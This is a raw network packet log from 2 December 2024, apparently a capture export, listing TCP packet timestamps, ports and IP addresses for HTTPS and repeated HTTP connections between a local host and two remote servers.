Dec 2, 2024 14:46:22.476948023 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:22.477333069 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:22.521291971 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:22.762856007 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:22.807337999 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091574907 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091618061 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091655970 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091670990 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.091695070 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091737986 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091766119 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.091772079 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091784000 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.091826916 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.099864960 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.099917889 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.099936008 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.108211040 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.108283997 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.108300924 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.161897898 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.161915064 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.208760023 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.211555004 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.255630016 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.283992052 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.287575960 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.287651062 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.287678957 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.298769951 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.299120903 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.299218893 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.299243927 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.300712109 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.306243896 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.313954115 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.314017057 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.314037085 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.321821928 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.321871996 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.321888924 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.329653978 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.329791069 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.329812050 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.345231056 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.345314026 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.345335960 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.353039026 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.353131056 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.353162050 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.353183031 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.353279114 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.360074997 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.411884069 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.411906004 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.458771944 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.475568056 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.478101015 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.478180885 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.478209019 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.486818075 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.486882925 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.486901999 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.491720915 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.491769075 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.491791010 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.501193047 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.501204967 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.501286030 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.501305103 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.510617971 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.510696888 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.510714054 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.510778904 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.515855074 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.515913010 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.521163940 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.521172047 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.521265984 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.529602051 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.529611111 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.529675961 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.539014101 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.539022923 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.539088964 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.548568010 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.548577070 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.548634052 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.553462982 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.553534031 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.669563055 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.669637918 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.676579952 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.676642895 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.681113005 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.681178093 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.684804916 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.684860945 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.692470074 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.692536116 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.695475101 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.695555925 CET	443	49700	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.695664883 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.704895973 CET	49700	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.707333088 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.707370043 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:23.707453966 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.707657099 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:23.707670927 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.012586117 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.016036987 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.016050100 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.643316984 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.643358946 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.643387079 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.643412113 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.643424988 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.643440962 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.643501997 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.651590109 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.651633024 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.651664972 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.651671886 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.651853085 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.661448002 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.669101000 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.669152975 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.669162035 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.719533920 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.719609022 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.719616890 CET	443	49701	104.21.12.202	192.168.2.7
Dec 2, 2024 14:46:25.719690084 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:25.726653099 CET	49701	443	192.168.2.7	104.21.12.202
Dec 2, 2024 14:46:27.578855991 CET	49703	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:27.698971987 CET	80	49703	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:27.702286959 CET	49703	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:27.704499960 CET	49703	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:27.824454069 CET	80	49703	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:27.824605942 CET	49703	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:27.944781065 CET	80	49703	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:29.253849030 CET	80	49703	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:29.254050970 CET	49703	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:29.254442930 CET	80	49703	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:29.254501104 CET	49703	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:29.374264956 CET	80	49703	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:29.530390978 CET	49709	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:29.650309086 CET	80	49709	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:29.650394917 CET	49709	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:29.652689934 CET	49709	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:29.772855997 CET	80	49709	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:29.772994041 CET	49709	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:29.892975092 CET	80	49709	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:31.063796043 CET	80	49709	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:31.063977957 CET	49709	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:31.064662933 CET	80	49709	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:31.064722061 CET	49709	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:31.122859955 CET	49710	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:31.184113979 CET	80	49709	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:31.242959023 CET	80	49710	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:31.243098021 CET	49710	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:31.245263100 CET	49710	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:31.365169048 CET	80	49710	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:31.365226030 CET	49710	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:31.485188961 CET	80	49710	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:32.727952003 CET	80	49710	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:32.728048086 CET	80	49710	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:32.728101969 CET	49710	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:32.728135109 CET	49710	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:32.848190069 CET	80	49710	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:32.868273973 CET	49716	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:32.988243103 CET	80	49716	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:32.988337994 CET	49716	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:32.990618944 CET	49716	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:33.110553026 CET	80	49716	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:33.110693932 CET	49716	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:33.231190920 CET	80	49716	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:34.432985067 CET	80	49716	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:34.433103085 CET	49716	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:34.434191942 CET	80	49716	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:34.434231997 CET	49716	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:34.553112030 CET	80	49716	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:34.595134020 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:34.715174913 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:34.715262890 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:34.717534065 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:34.837760925 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:34.837852955 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:34.958041906 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.427772999 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.427792072 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.427884102 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:36.427963972 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:36.430097103 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.430146933 CET	49722	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:36.548290968 CET	80	49722	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.653547049 CET	49723	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:36.773724079 CET	80	49723	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.773823023 CET	49723	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:36.776074886 CET	49723	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:36.896049023 CET	80	49723	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:36.896166086 CET	49723	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:37.016609907 CET	80	49723	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:38.218028069 CET	80	49723	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:38.218158007 CET	49723	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:38.218255043 CET	80	49723	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:38.218301058 CET	49723	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:38.338335037 CET	80	49723	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:38.372675896 CET	49730	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:38.492733955 CET	80	49730	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:38.492821932 CET	49730	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:38.495258093 CET	49730	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:38.615283012 CET	80	49730	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:38.615372896 CET	49730	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:38.735306978 CET	80	49730	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:39.876501083 CET	80	49730	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:39.876558065 CET	80	49730	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:39.876615047 CET	49730	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:39.876650095 CET	49730	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:39.996640921 CET	80	49730	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:40.025382042 CET	49737	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:40.145473003 CET	80	49737	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:40.145553112 CET	49737	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:40.147806883 CET	49737	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:40.267707109 CET	80	49737	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:40.267793894 CET	49737	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:40.387746096 CET	80	49737	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:41.558192968 CET	80	49737	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:41.558317900 CET	49737	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:41.558691978 CET	80	49737	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:41.558739901 CET	49737	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:41.678313971 CET	80	49737	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:41.694797993 CET	49745	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:41.814764023 CET	80	49745	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:41.815335035 CET	49745	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:41.817569017 CET	49745	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:41.937787056 CET	80	49745	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:41.937967062 CET	49745	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:42.057856083 CET	80	49745	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:43.173526049 CET	80	49745	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:43.173636913 CET	49745	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:43.173886061 CET	80	49745	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:43.173960924 CET	49745	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:43.293584108 CET	80	49745	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:43.319370031 CET	49746	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:43.441040039 CET	80	49746	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:43.441135883 CET	49746	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:43.443485022 CET	49746	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:43.563482046 CET	80	49746	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:43.563585997 CET	49746	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:43.683810949 CET	80	49746	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:44.864051104 CET	80	49746	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:44.864180088 CET	49746	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:44.864686012 CET	80	49746	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:44.864729881 CET	49746	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:44.984213114 CET	80	49746	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:45.072175980 CET	49752	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:45.192161083 CET	80	49752	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:45.192292929 CET	49752	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:45.194531918 CET	49752	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:45.314543962 CET	80	49752	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:45.314614058 CET	49752	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:45.434617043 CET	80	49752	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:46.621887922 CET	80	49752	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:46.621994972 CET	49752	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:46.622703075 CET	80	49752	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:46.622754097 CET	49752	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:46.742023945 CET	80	49752	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:46.758955002 CET	49758	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:46.878875017 CET	80	49758	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:46.878985882 CET	49758	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:46.881537914 CET	49758	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:47.001456022 CET	80	49758	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:47.001554966 CET	49758	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:47.121505022 CET	80	49758	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:48.318416119 CET	80	49758	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:48.318545103 CET	49758	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:48.319160938 CET	80	49758	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:48.319205999 CET	49758	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:48.438704967 CET	80	49758	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:48.467184067 CET	49764	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:48.587517023 CET	80	49764	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:48.587608099 CET	49764	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:48.589751005 CET	49764	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:48.710241079 CET	80	49764	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:48.710340977 CET	49764	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:48.830322981 CET	80	49764	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:49.963701010 CET	80	49764	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:49.963816881 CET	49764	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:49.964175940 CET	80	49764	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:49.964226007 CET	49764	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:50.083810091 CET	80	49764	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:50.105209112 CET	49765	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:50.225308895 CET	80	49765	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:50.225402117 CET	49765	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:50.227560043 CET	49765	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:50.347487926 CET	80	49765	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:50.347634077 CET	49765	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:50.467504025 CET	80	49765	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:51.732389927 CET	80	49765	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:51.732409000 CET	80	49765	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:51.732546091 CET	49765	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:51.732546091 CET	49765	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:51.883542061 CET	49771	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:51.972163916 CET	80	49765	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:52.003559113 CET	80	49771	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:52.003707886 CET	49771	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:52.042671919 CET	49771	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:52.162941933 CET	80	49771	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:52.163008928 CET	49771	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:52.283023119 CET	80	49771	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:53.403362989 CET	80	49771	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:53.403456926 CET	49771	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:53.404169083 CET	80	49771	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:53.404334068 CET	49771	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:53.523509026 CET	80	49771	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:53.543770075 CET	49777	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:53.663786888 CET	80	49777	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:53.663923025 CET	49777	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:53.666260958 CET	49777	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:53.787606955 CET	80	49777	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:53.787714958 CET	49777	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:53.907653093 CET	80	49777	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:55.088901043 CET	80	49777	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:55.088989973 CET	49777	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:55.089905024 CET	80	49777	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:55.089946985 CET	49777	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:55.208978891 CET	80	49777	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:55.227489948 CET	49781	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:55.347476006 CET	80	49781	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:55.347573042 CET	49781	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:55.371119022 CET	49781	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:55.491090059 CET	80	49781	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:55.491152048 CET	49781	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:55.611196041 CET	80	49781	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:56.837189913 CET	80	49781	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:56.837352991 CET	49781	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:56.838927984 CET	80	49781	104.21.57.140	192.168.2.7
Dec 2, 2024 14:46:56.838977098 CET	49781	80	192.168.2.7	104.21.57.140
Dec 2, 2024 14:46:56.957364082 CET	80	49781	104.21.57.140	192.168.2.7
